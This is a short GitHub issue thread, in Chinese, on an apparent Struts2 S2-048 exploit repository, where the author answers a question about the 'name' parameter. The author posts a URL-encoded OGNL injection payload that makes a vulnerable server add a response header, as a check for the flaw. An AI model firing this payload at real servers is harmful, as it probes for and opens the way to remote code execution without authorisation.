### ISSUE TITLE
作者..这个可以加到header里面吗

### ISSUE THREAD

**Issue by Lz1y** [dragoneeg/Struts2-048#1]
如果没有name这个参数，网站不传递你的payload...岂不是无效？

**Comment by dragoneeg** [comment]
可以复现，我刚截图，并且name参数的内容就是payload:[demo.jpg](https://github.com/dragoneeg/Struts2-048/blob/master/demo.jpg)
![image](https://github.com/dragoneeg/Struts2-048/blob/master/demo.jpg)

**Comment by dragoneeg** [comment]
加到header用这个payload：
`age=bbb&__checkbox_bustedBefore=true&name=%24%7B%7B%23context%5B%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%5D.addHeader%28%27X-PenTestIT%27%2C3333-2222%29%7D%7D&description=ccc: undefined`
检测response的header里是否有：`X-PenTestIT: 1111`

from：[http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/](http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/)

**Comment by dragoneeg** [comment]
没有问题我就关掉啦？有事再请留言
